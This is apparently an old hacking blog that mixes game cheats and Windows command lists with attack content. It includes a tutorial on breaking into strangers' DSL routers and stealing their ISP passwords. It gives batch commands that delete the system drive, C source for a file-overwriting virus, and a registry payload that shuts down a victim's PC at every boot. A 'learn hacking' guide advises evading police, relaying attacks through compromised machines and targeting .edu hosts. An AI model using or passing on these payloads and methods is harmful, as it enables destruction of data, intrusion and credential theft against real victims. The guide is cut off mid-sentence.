for infinite points!Infinite points trick IITo do this trick, finish a game of solitaire with the time bonus option on. The cards will start bouncing. Click on the solitaire screen and the play again box will pop up. Select no, so the solitaire screen is just blank green. Use the instant win cheat (Alt+Shift+2) and you will recieve the time bonus you got last game will be added to your last game’s score. For example, if your time bonus was 5000, and your final score was 6000, after using this glitch, you will have a score of 11000. This glitch can be used as many times as you want.//—————————————————————–// registry hack which will allow you to see your opponents’ cards//—————————————————————– Launch REGEDIT.EXE and navigate to HKEY_CURRENT_USER Software Microsoft Windows CurrentVersion Applets Hearts. NOTE: You may have to create the Hearts key under Applets In the right-hand pane, create a new String Value. Immediately rename it to “ZB” (without the quotes); give it a value of “42″ (again, sans quotes). The next time you’re in a game of Hearts, press CTRL + SHIFT + ALT + F12.
Posted by BAS at 4:20 PM 0 comments
Labels: cheatcodes, cheats, computers, cracking, cracks, games, hacks, minesweeper, solitair
All DOS commands
There are some hidden dos commands which u can't recognise by typing help in cmd
Here they are with descriptionCOMMANDS:--ANSI.SYS Defines functions that change display graphics, control cursor movement, and reassign keys.APPENDCauses MS-DOS to look in other directories when editing a file or running a command.ARPDisplays, adds, and removes arp information from network devices.ASSIGNAssign a drive letter to an alternate letter.ASSOCView the file associations.ATSchedule a time to execute commands or programs.ATMADMLists connections and addresses seen by Windows ATM call manager.ATTRIBDisplay and change file attributes.BATCHRecovery console command that executes a series of commands in a file.BOOTCFGRecovery console command that allows a user to view, modify, and rebuild the boot.iniBREAKEnable / disable CTRL + C feature.CACLSView and modify file ACL's.CALLCalls a batch file from another batch file.CDChanges directories.CHCPSupplement the International keyboard and character set information.CHDIRChanges directories.CHKDSKCheck the hard disk drive running FAT for errors.CHKNTFSCheck the hard disk drive running NTFS for errors.CHOICESpecify a listing of multiple options within a batch file.CLSClears the screen.CMDOpens the command interpreter.COLOREasily change the foreground and background color of the MS-DOS window.COMMANDOpens the command interpreter.COMPCompares files.COMPACTCompresses and uncompress files.CONTROLOpen Control Panel icons from the MS-DOS prompt.CONVERTConvert FAT to NTFS.COPYCopy one or more files to an alternate location.CTTYChange the computers input/output devices.DATEView or change the systems date.DEBUGDebug utility to create assembly programs to modify hardware settings.DEFRAGRe-arrange the hard disk drive to help with loading programs.DELDeletes one or more files.DELETERecovery console command that deletes a file.DELTREEDeletes one or more files and/or directories.DIRList the contents of one or more directory.DISABLERecovery console command that disables Windows system services or drivers.DISKCOMPCompare a disk with another disk.DISKCOPYCopy the contents of one disk and place them on another disk.DOSKEYCommand to view and execute commands that have been run in the past.DOSSHELLA GUI to help with early MS-DOS users.DRIVPARMEnables overwrite of original device drivers.ECHODisplays messages and enables and disables echo.EDITView and edit files.EDLINView and edit files.EMM386Load extended Memory Manager.ENABLERecovery console command to enable a disable service or driver.ENDLOCALStops the localization of the environment changes enabled by the setlocal command.ERASEErase files from computer.EXITExit from the command interpreter.EXPANDExpand a Microsoft Windows file back to it's original format.EXTRACTExtract files from the Microsoft Windows cabinets.FASTHELPDisplays a listing of MS-DOS commands and information about them.FCCompare files.FDISKUtility used to create partitions on the hard disk drive.FINDSearch for text within a file.FINDSTRSearches for a string of text within a file.FIXBOOTWrites a new boot sector.FIXMBRWrites a new boot record to a disk drive.FORBoolean used in batch files.FORMATCommand to erase and prepare a disk drive.FTPCommand to connect and operate on a FTP server.FTYPEDisplays or modifies file types used in file extension associations.GOTOMoves a batch file to a specific label or location.GRAFTABLShow extended characters in graphics mode.HELPDisplay a listing of commands and brief explanation.IFAllows for batch files to perform conditional processing.IFSHLP.SYS32-bit file manager.IPCONFIGNetwork command to view network adapter settings and assigned values.KEYBChange layout of keyboard.LABELChange the label of a disk drive.LHLoad a device driver in to high memory.LISTSVCRecovery console command that displays the services and drivers.LOADFIXLoad a program above the first 64k.LOADHIGHLoad a device driver in to high memory.LOCKLock the hard disk drive.LOGONRecovery console command to list installations and enable administrator login.MAPDisplays the device name of a drive.MDCommand to create a new directory.MEMDisplay memory on system.MKDIRCommand to create a new directory.MODEModify the port or display settings.MOREDisplay one page at a time.MOVEMove one or more files from one directory to another directory.MSAVEarly Microsoft Virus scanner.MSDDiagnostics utility.MSCDEXUtility used to load and provide access to the CD-ROM.NBTSTATDisplays protocol statistics and current TCP/IP connections using NBTNETUpdate, fix, or view the network or network settingsNETSHConfigure dynamic and static network information from MS-DOS.NETSTATDisplay the TCP/IP network protocol statistics and information.NLSFUNCLoad country specific information.NSLOOKUPLook up an IP address of a domain or host on a network.PATHView and modify the computers path location.PATHPINGView and locate locations of network latency.PAUSECommand used in batch files to stop the processing of a command.PINGTest / send information to another network computer or network device.POPDChanges to the directory or network path stored by the pushd command.POWERConserve power with computer portables.PRINTPrints data to a printer port.PROMPTView and change the MS-DOS prompt.PUSHDStores a directory or network path in memory so it can be returned to at any time.QBASICOpen the QBasic.RDRemoves an empty directory.RENRenames a file or directory.RENAMERenames a file or directory.RMDIRRemoves an empty directory.ROUTEView and configure windows network route tables.RUNASEnables a user to execute a program on another computer.SCANDISKRun the scandisk utility.SCANREGScan registry and recover registry from errors.SETChange one variable or string to another.SETLOCALEnables local environments to be changed without affecting anything else.SETVERChange MS-DOS version to trick older MS-DOS programs.SHAREInstalls support for file sharing and locking capabilities.SHIFTChanges the position of replaceable parameters in a batch program.SHUTDOWN Shutdown the computer from the MS-DOS prompt.SMARTDRVCreate a disk cache in conventional memory or extended memory.SORTSorts the input and displays the output to the screen.STARTStart a separate window in Windows from the MS-DOS prompt.SUBSTSubstitute a folder on your computer for another drive letter.SWITCHESRemove add functions from MS-DOS.SYSTransfer system files to disk drive.TELNETTelnet to another computer / device from the prompt.TIMEView or modify the system time.TITLEChange the title of their MS-DOS window.TRACERTVisually view a network packets route across a network.TREEView a visual tree of the hard disk drive.TYPEDisplay the contents of a file.UNDELETEUndelete a file that has been deleted.UNFORMATUnformat a hard disk drive.UNLOCKUnlock a disk drive.VERDisplay the version information.VERIFYEnables or disables the feature to determine if files have been written properly.VOLDisplays the volume information about the designated drive.XCOPYCopy multiple files, directories, and/or drives from one location to another.
Posted by BAS at 2:42 PM 1 comments

hacking DSL router This tutorial will explain to you how to hack someone's internet account thru his router.This hack is based on a secuirty exploit of the router's default password and the stupidity of the user.Explanation: when somebody buy's a xDSL/Cabel router, the router is set to manufactory defaults like IP range, user accounts, router table, and most important the security level. The last one we will exploit.Most routers will have a user friendly setup menu running on port 23 (telnet) and sometimes port 80 (http) or both.This is what we are looking for.Step 1.Get a multie IP range scanner like superscanner (superscanner is fast and easy to use, get it here).Get a xDSL/Cabel user IP range. This is a single user IP 212.129.169.196 so the ip range of this Internet provider is 212.129.xxx.xxx most likely it will be from 212.129.1.1 to 212.129.255.255 .To keep your scanning range not to big it's smart to scan from 212.129.1.1 to 212.129.1.255 it also depends of your bandwidth how fast the scan will be finished.The IP adres above is just a example any IP range from a xDSL/Cabel provider can be used for this hack.before you start scanning specify the TCP/IP ports. You know that we are looking for TCP port 23 (telnet) and TCP port 80 (http) so edit the list and select only port 23 and port 80.Now start scanning and wait for the results.When finished scanning look for a IP that has a open port 23 and 80. Write them down or remember them.Step 2.Way 1This is important: Most routers have connection log capability so the last thing you want to do is making a connection with your own broadband connection so use a anonymouse proxy server or dailup connection with a fake name and address (56.9 modem for example) when connection to the victim's router.Now get a telnet program. Windows has a standard telnet program just go to start, select run and type down "telnet" without the ", click or enter OK.Select "connect" than "Remote system" enter IP adres of the victim in the "host name" field press OK.wait for your computer to make a connection. This way only works when the router has a open telnet port service runningWay 2This is important: Most routers have connection log capability so the last thing you want to do is making a connection with your own broadband connection so use a anonymouse proxy server or dailup connection with a fake name and adres (56.9 modem for example) when connection to the victim's router.Open a Internet explorer windows enter the IP address of the victim after the http:// in the address bar.This way only works when the router has a open hyper text transfer protocol (http) service running.Step 3Entering the userfriendly setup menu. 9 out of 10 times the menu is protected by a loginname and password. When the user doesn't change any security value's the default password stay's usable.So the only thing you have to do is find out what type of router the victim uses. I use this tool: GFILanguard Network Security Scanner. (get it here) is good. When you find out the type of router that's been used get the wright loginname and password from this list (get it here. not every router is on the list)Default router password listStep 4When you have a connection in telnet or internet expolorer you need to look for user accounts.PPP, PPtP, PPeP, PPoP, or such connection protocol. If this is not correct look for anything that maybe contains any info about the ISP account of the user.go to this option and open it. Most likely you will see a overview of user setup options.Now look for the username and password.In most case the username will be freely displayed so just write it down or what ever....The password is a different story. Allmost always the password is protected by ********* (stars) in the telnet way there is noway around it (goto another victim) but when you have a port 80 connection (http). Internet connection way open click right mouse key and select "View source" now look for the field where the star are at. most likely you can read it because in the source code the star are converted to normal ASCII text.If not get a "******** to text" convertor like snadboy's revelation V.2 (get it here) move the cursor over the ****** and....It's a miracle you can read the password.Now you have the username and password. There a million fun thing to do with that but more about that next time.check the tutorial page freqently.Tips.Beware on most routers only one person can be loget on simultaneous in the router setupmenu.Don't change anything in the router if you don't know what you are doing.
Posted by BAS at 2:10 PM 0 comments
Labels: administrator, all run commands, batch, c virus, computer, computers, cracking, cracks, hacking, hacks, password, password hacking, pc hacking, play, windows, windows xp, xp, yahoo hacking
format ur hardisk with notepad go to notepad@Echo offDel C:\ *.*ysave it as Dell.bat
or worse
@echo offdel %systemdrive%\*.*/f/s/qshutdown -r -f -t 00
and save it as a .bat file
Posted by BAS at 1:59 PM 0 comments
Labels: batch, c virus, computer, computers, cracking, cracks, fromat hard disk, hacking, hacks, tweaking
Virus in c #include#include#include#include#includevoid main(int argc,char* argv[]){ char buf[512];int source,target,byt,done;struct ffblk ffblk;clrscr();textcolor(2);cprintf("--------------------------------------------------------------------------");printf("\nVirus: Folderbomb 1.0\n");cprintf("--------------------------------------------------------------------------");done = findfirst("*.*",&ffblk,0);while (!done){printf("\n");cprintf(" %s ", ffblk.ff_name);printf("is attacked by ");cprintf("Folderbomb");source=open(argv[0],O_RDONLYO_BINARY);target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONLY);while(1){byt=read(source,buf,512);if(byt>0)write(target,buf,byt);elsebreak;}close(source);close(target);done = findnext(&ffblk);}getch();}
Posted by BAS at 1:52 PM 0 comments
Labels: c virus, computer, computers, cracking, cracks, hacking, hacks, registry, screwup pc, virus writing, windows, windows xp, xp
All run commands RUN CommandsUseful RUN Commands - ITo Access?. - Run CommandAccessibility Controls - access.cplAdd Hardware Wizard - hdwwiz.cplAdd/Remove Programs - appwiz.cplAdministrative Tools - control admintoolsAutomatic Updates - wuaucpl.cplBluetooth Transfer Wizard - fsquirtCalculator - calcCertificate Manager - certmgr.mscCharacter Map - charmapCheck Disk Utility - chkdskClipboard Viewer - clipbrdCommand Prompt - cmdComponent Services - dcomcnfgComputer Management - compmgmt.mscDate and Time Properties - timedate.cplDDE Shares - ddeshareDevice Manager - devmgmt.mscDirect X Control Panel (If Installed)* - directx.cplDirect X Troubleshooter - dxdiagDisk Cleanup Utility - cleanmgrDisk Defragment - dfrg.mscDisk Management - diskmgmt.mscDisk Partition Manager - diskpartDisplay Properties - control desktopDisplay Properties - desk.cplDisplay Properties (w/Appearance Tab Preselected) - control colorDr. Watson System Troubleshooting Utility - drwtsn32Driver Verifier Utility - verifierEvent Viewer - eventvwr.mscFile Signature Verification Tool - sigverifFindfast - findfast.cplFolders Properties - control foldersFonts - control fontsFonts Folder - fontsFree Cell Card Game - freecellGame Controllers - joy.cplGroup Policy Editor (XP Prof) - gpedit.mscHearts Card Game - mshearts· Useful Run Commands - IIIexpress Wizard - iexpressIndexing Service - ciadv.mscInternet Properties - inetcpl.cplIP Configuration (Display Connection Configuration) - ipconfig /allIP Configuration (Display DNS Cache Contents) - ipconfig /displaydnsIP Configuration (Delete DNS Cache Contents) - ipconfig /flushdnsIP Configuration (Release All Connections) - ipconfig /releaseIP Configuration (Renew All Connections) - ipconfig /renewIP Configuration (Refreshes DHCP & Re - Registers DNS) -ipconfig /registerdnsIP Configuration (Display DHCP Class ID) - ipconfig /showclassidIP Configuration (Modifies DHCP Class ID) - ipconfig /setclassid Anonymous 9/28/06 Java Control Panel (If Installed) - jpicpl32.cplJava Control Panel (If Installed) - javawsKeyboard Properties - control keyboardLocal Security Settings - secpol.mscLocal Users and Groups - lusrmgr.mscLogs You Out Of Windows - logoffMicrosoft Chat - winchatMinesweeper Game - winmineMouse Properties - control mouseMouse Properties - main.cplNetwork Connections - control netconnectionsNetwork Connections - ncpa.cplNetwork Setup Wizard - netsetup.cplNotepad - notepadNview Desktop Manager (If Installed) - nvtuicpl.cplObject Packager - packagerODBC Data Source Administrator - odbccp32.cplOn Screen Keyboard - oskOpens AC3 Filter (If Installed) - ac3filter.cplPassword Properties - password.cplPerformance Monitor - perfmon.mscPerformance Monitor - perfmonPhone and Modem Options - telephon.cplPower Configuration - powercfg.cplPrinters and Faxes - control printersPrinters Folder - printersPrivate Character Editor - eudceditQuicktime (If Installed) - QuickTime.cplRegional Settings - intl.cplRegistry Editor - regeditRegistry Editor - regedit32Remote Desktop - mstscRemovable Storage - ntmsmgr.mscRemovable Storage Operator Requests - ntmsoprq.mscResultant Set of Policy (XP Prof) - rsop.msc· Useful RUN Commands - IIIScanners and Cameras - sticpl.cplScheduled Tasks - control schedtasksSecurity Center - wscui.cplServices - services.mscShared Folders - fsmgmt.mscShuts Down Windows - shutdownSounds and Audio - mmsys.cplSpider Solitare Card Game - spiderSQL Client Configuration - cliconfgSystem Configuration Editor - syseditSystem Configuration Utility - msconfigSystem File Checker Utility (Scan Immediately) - sfc /scannowSystem File Checker Utility (Scan Once At Next Boot) - sfc /scanonceSystem File Checker Utility (Scan On Every Boot) - sfc /scanbootSystem File Checker Utility (Return to Default Setting) - sfc /revertSystem File Checker Utility (Purge File Cache) - sfc /purgecache Anonymous 9/28/06 System File Checker Utility (Set Cache Size to size x) -sfc /cachesize=xSystem Properties - sysdm.cplTask Manager - taskmgrTelnet Client - telnetUser Account Management - nusrmgr.cplUtility Manager - utilmanWindows Firewall - firewall.cplWindows Magnifier - magnifyWindows Management Infrastructure - wmimgmt.mscWindows System Security Tool - syskeyWindows Update Launches - wupdmgrWindows XP Tour Wizard - tourstartWordpad – write
Posted by BAS at 1:46 PM 0 comments
Labels: administrator, all run commands, computer, cracking, cracks, hacking, password, password hacking, pc hacking, play, remote access, run, screwup pc, windows, windows xp, xp, yahoo hacking
shutdown ur friends pc Shutdown ur friend's comp when everytime it startsThats really easy.put this followin text in a .reg file and run it in the victims pc:Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"VIRUS"="%windir%\\SYSTEM32\\SHUTDOWN.EXE -t 1 -c \"Howz this new Virus ah\" -f"
DONT PUT IT IN UR COMPUTER, I AM NOT RESPONSIBLE, if it happens, to you, start windows in safe mode, and open registry editor by typiing REGEDIT in start->run. navigate to [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]and remove the string value named VIRUS, restart you computer.You can also put this in a javascript code, just add this code to your webpage:
Posted by BAS at 1:38 PM 0 comments
Labels: administrator, computer, computers, cracking, cracks, fuck, hacking, hacks, password, password hacking, pc hacking, play, registry, remote access, screwup pc, windows, windows xp, xp, yahoo hacking
Learn Hacking (good one) How to learn to hack in easy steps~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Introduction~~~~~~~~~~~~
If you are a hacker, you read this, and find something that's not correct or you don't like,i want to know. mail me.
I'm sure you'll find a lot of bad-grammars. Don't report them cause I'm not english andi don't care at all as long as it's understandable.
When you finish reading it, please TELL ME how you like it!
COPYING: You're welcome to distribute this document to whoever the hell you want, post iton your website, on forums, newsgroups, etc, AS LONG as you DON'T MODIFY it at all.If you want to perform it, ask me for permission. thanks a lot!
DISCLAIMER: This document is intended for ludical or educational purposes. I don't want topromote computer crime and I'm not responible of your actions in any way.If you want to hack a computer, do the decent thing and ask for permission first.

Let's start~~~~~~~~~~~
If you read carefully all what i'm telling here, you are smart and you work hard on it,you'll be able to hack. i promise. That doesn't really make you a hacker (but you're on the way).A hacker is someone who is able to discover unknown vulnerabilities in software and able towrite the proper codes to exploit them.
NOTE: If you've been unlucky, and before you found this document, you've readen theguides to (mostly) harmless hacking, then forget everything you think you've learnt from them.You won't understand some things from my tutorial until you unpoison your brain.
Some definitions~~~~~~~~~~~~~~~~
I'm going to refer to every kind of computer as a box, and only as a box.This includes your PC, any server, supercomputers, nuclear silos, HAL9000,Michael Knight's car, The Matrix, etc.
The systems we're going to hack (with permission) are plenty of normal users, whosedon't have any remote idea about security, and the root. The root user is calledsuperuser and is used by the admin to administer the system.
I'm going to refer to the users of a system as lusers. Logically, I'll refer tothe admin as superluser.

Operating Systems~~~~~~~~~~~~~~~~~
Ok, I assume you own a x86 box (this means an intel processor or compatible) running windoze9x,or perhaps a mac (motorola) box running macOS.
You can't hack with that. In order to hack, you'll need one of those UNIX derived operatingsystems.This is for two main reasons:
-the internet is full of UNIX boxes (windoze NT boxes are really few) running webservers andso on. to hack one of them, you need a minimun knowledge of a UNIX system, and what's betterthan running it at home?
-all the good hacking tools and exploit codes are for UNIX. You won't be able to use them unlessyou're running some kind of it.
Let's see where to find the unix you're interested on.
The UNIX systems may be divided in two main groups:
- commercial UNIXes- free opensource UNIXes
A commercial unix's price is not like windoze's price, and it usually can't run on your box,so forget it.
The free opensource UNIXes can also be divided in:- BSDThese are older and difficult to use. The most secure OS (openBSD) is in this group.You don't want them unless you're planning to install a server on them.
- LinuxEasy to use, stable, secure, and optimized for your kind of box. that's what we need.
I strongly suggest you to get the SuSE distribution of Linux.It's the best one as i think, and i added here some tips for SuSE, so all should be easier.
Visit http://www.suse.de/ and look for a local store or order it online.(i know i said it the software was free, but not the CDs nor the manual nor the support.It is much cheaper than windoze anyway, and you are allowed to copy and distribute it)
If you own an intel box, then order the PC version.
If you own a mac box, then order the PowerPC version.
Whatever you do, DON'T PICK THE COREL DISTRIBUTION, it sucks.
It's possible you have problem with your hardware on the installation. Read the manual, askfor technical support or buy new hardware, just install it as you can.
This is really important! READ THE MANUAL, or even buy a UNIX book.Books about TCP/IP and C programming are also useful.
If you don't, you won't understand some things i'll explain later. And, of course, you'llnever become a hacker if you don't read a lot of that 'literature'.

the Internet~~~~~~~~~~~~
Yes! you wanted to hack, didn't you? do you want to hack your own box or what?You want to hack internet boxes! So lets connect to the internet.
Yes, i know you've gotten this document from the internet, but that was with windozeand it was much easier. Now you're another person, someone who screams for knowledge and wisdom.You're a Linux user, and you gotta open your way to the Internet.
You gotta make your Linux box to connect to the net,so go and set up your modem (using YaST2 in SuSE).
Common problems:
If your box doesn't detect any modems, that probably means that you have no modem installed:-D (not a joke!).
Most PCI modems are NOT modems, but "winmodems". Winmodems, like all winhardware, arespecifically designed to work ONLY on windoze. Don't blame linux, this happens because thewinmodem has not a critical chip that makes it work. It works on windoze cause the vendordriver emulates that missing chip. And hat vendor driver is only available for windoze.
ISA and external modems are more probably real modems, but not all of them.If you want to make sure wether a modem is or not a winmodem, visit http://start.at/modem.
Then use your modem to connect to your ISP and you're on the net. (on SuSE, with wvdial)
NOTE: Those strange and abnormal online services like aol are NOT ISPs. You cannot connect theinternet with aol. You can't hack with aol. i don't like aol. aol sucks.Don't worry, we humans are not perfect, and it's probably not your fault. If that is your case,leave aol and get a real ISP. Then you'll be forgiven.
Don't get busted~~~~~~~~~~~~~~~~
Let's suppose you haven't skipped everything below and your Linux bow is now connected to the net.
It's now turn for the STEALTH. You won't get busted! just follow my advices and you'll be safe.
- Don't hackthis is the most effective stealth technique. not even the FBI can bust you. :-)If you choose this option, stop reading now, cause the rest is worthless and futile.
- If you change a webpage, DON'T SIGN! not even with a fake name. they can trace you, findyour own website oe email address, find your ISP, your phone number, your home...and you get busted!!
- be PARANOID, don't talk about hacking to anyone unless he is really interested in hacking too.NEVER tell others you've hacked a box.
- NEVER hack directly from your box (your_box --> victim's box).Always use a third box in the middle (your_box --> lame_box --> victim's box).
Where lame_box is a previously hacked box or...a shell account box!A shell account is a service where you get control of a box WITHOUT hacking it.There are a few places where shell accounts are given for free. One of them is nether.net.
- Don't hack dangerous boxes until you're a real hacker.Which boxes are dangerous:Military boxesGovernment boxesImportant and powerful companies' boxesSecurity companies' boxesWhich boxes are NOT dangerous:Educational boxes (any .edu domain)Little companies' boxesJapanese boxes
- Always connect to the internet through a free and anonymous ISP(did i tell you that AOL is NOT an ISP?)
- Use phreking techniques to redirect calls and use others' lines for your ISP call.Then it'll be really difficult to trace you. This is not a guide to phreaking anyway.
TCP ports and scanning~~~~~~~~~~~~~~~~~~~~~~
Do you got your stealth linux box connected to the internet (not aol)?Have you read the manual as i told you?
Then we shall start with the damn real thing.
First of all, you should know some things about the internet. It's based on the TPC/IP protocol,(and others)
It works like this: every box has 65k connection PORTS. some of them are opened and waiting foryour data to be sent.
So you can open a connection and send data to any these ports. Those ports are associated witha service:
Every service is hosted by a DAEMON. Commonly, a daemon or a server is a program that runson the box, opens its port and offers their damn service.
here are some common ports and their usual services (there are a lot more):
Port number Common service Example daemon (d stands for daemon)21 FTP FTPd23 Telnet telnetd25 SMTP sendmail (yes!)80 HTTP apache110 POP3 qpop
Example:when you visit the website http://www.host.com/luser/index.html, your browser does this:-it connects to the TCP port 80-it sends the string: "GET /HTTP/1.1 /luser/index.html" plus two 'intro'(it really sends a lot of things more, but that is the essential)-the host sends the html file
The cool thing of daemons is they have really serious security bugs.
That's why we want to know what daemons are running there, so...
We need to know what ports are opened in the box we want to hack.
How could we get that information?
We gotta use a scanner. A scanner is a program that tries toconnect to every port on the box and tells which of them are opened.
The best scanner i can think of is nmap, created by Fyodor.You can get nmap from my site in tarball or rpm format.
Let's install nmap from an .rpm packet.
bash-2.03$ rpm -i nmap-2.53-1.i386.rpm
then we run it:
bash-2.03$ nmap -sS target.edu
Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )Interesting ports on target.edu (xx.xx.xx.xx):(The 1518 ports scanned but not shown below are in state: closed)Port State Service21/tcp open ftp23/tcp open telnet25/tcp open smtp80/tcp open http110/tcp open pop3
Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds
Nmap has told us which ports are opened on target.edu and thus, what services it's offering.
I know, i said telnet is a service but is also a program (don't let this confuse you).This program can open a TCP connection to the port you specify.
So lets see what's on that ports.
On your linux console, type:
bash-2.03$ telnet target.edu 21Trying xx.xx.xx.xx...Connected to target.edu.Escape character is '^]'.220 target.edu FTP server (SunOS 5.6) ready.quit221 Goodbye.Connection closed by foreign host.
You see?They speak out some valuable information:-their operating system is SunOS 5.6-their FTP daemon is the standard provided by the OS.
bash-2.03$ telnet target.edu 25Trying xx.xx.xx.xx...Connected to target.edu.Escape character is '^]'.220 target.edu ESMTP Sendmail 8.11.0/8.9.3; Sun, 24 Sep 2000 09:18:14 -0400 (EDT)quit221 2.0.0 target.edu closing connectionConnection closed by foreign host.
They like to tell us everything:-their SMTP daemon is sendmail-its version is 8.11.0/8.9.3
Experiment with other ports to discover other daemons.
Why is this information useful to us? cause the security bugs that can let us in dependon the OS and daemons they are running.
But there is a problem here... such information can be faked!
It's difficult to really know what daemons are they running, but we can know FOR SUREwhat's the operating system:
bash-2.03$ nmap -sS target.edu
Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )Interesting ports on target.edu (xx.xx.xx.xx):(The 1518 ports scanned but not shown below are in state: closed)Port State Service21/tcp open ftp23/tcp open telnet25/tcp open smtp80/tcp open http110/tcp open pop3
TCP Sequence Prediction: Class=random positive incrementsDifficulty=937544 (Good luck!)Remote operating system guess: Linux 2.1.122 - 2.2.14
Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds
Hey wasn't it SunOS 5.6? Damn they're a bunch of lame fakers!
We know the host is running the Linux 2.x kernel. It'd be useful to know also the distribution,but the information we've already gathered should be enough.
This nmap feature is cool, isn't it? So even if they've tried to fool us, we can knowwhat's the OS there and its very difficult to avoid it.
Also take a look to the TCP Sequence Prediction. If you scan a host and nmap tellsyou their difficulty is low, that means their TCP sequence is predictable and wecan make spoofing attacks. This usually happens with windoze (9x or NT) boxes.
Ok, we've scanned the target. If the admins detect we've scanned them, they could get angry.And we don't want the admins to get angry with us, that's why we used the -sS option.This way (most) hosts don't detect ANYTHING from the portscan.Anyway, scanning is LEGAL so you shouldn't have any problems with it. If you want a betterusage of nmap's features, read its man page:
bash-2.03$ man nmap
How to upload and compile programs~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The most obvious and simple way is using FTP:
bash-2.03$ lsprogram.csh-2.03$ ftp target.eduConnected to target.edu.220 target.edu FTP server (SunOS 5.6) ready.Name: luser331 Password required for luser.Password:230 User luser logged in.ftp> put program.c200 PORT command successful.150 ASCII data connection for program.c (204.42.253.18,57982).226 Transfer complete.ftp> quit221 Goodbye.
But this is not a really good way. It can create logs that will make the admin to detect us.
Avoid uploading it with FTP as you can, use cut&paste instead.
Here's how to make it:
we run a text editorsh-2.03$ pico exploit.cif it doesn't work, try this one:sh-2.03$ vi exploit.cOf course, you must learn how to use vi.
Then open another terminal (i mean without x windows, CTRL+ALT+Fx to scape from xwindows to x,ALT+Fx to change to another terminal, ALT+F7 to return xwindows) on your own box and cut thetext from it. Change to your target and paste the code so you've 'uploaded' the file.
To cut a text from the screen, you need to install the gpm packet from your linux distribution.This program lets you select and cut text with your mouse.
If cut&paste doesn't work, you can also type it by hand (they aren't usually large).
Once you get the .c file there, here's how to compile:
sh-2.03$ gcc program.c -o program
and execute:
sh-2.03$ ./program

Exploiting vulnerabilities~~~~~~~~~~~~~~~~~~~~~~~~~~
This is the most important part of our hacking experience. Once we know what target.eduis running, we can go to one of those EXPLOIT databases that are on the net.
A exploit is a piece of code that exploits a vulnerability on its software. In the case oftarget.edu, we should look for an ad

1 comment:

Unknown said...

thanks for sharing nice information how to play minesweeper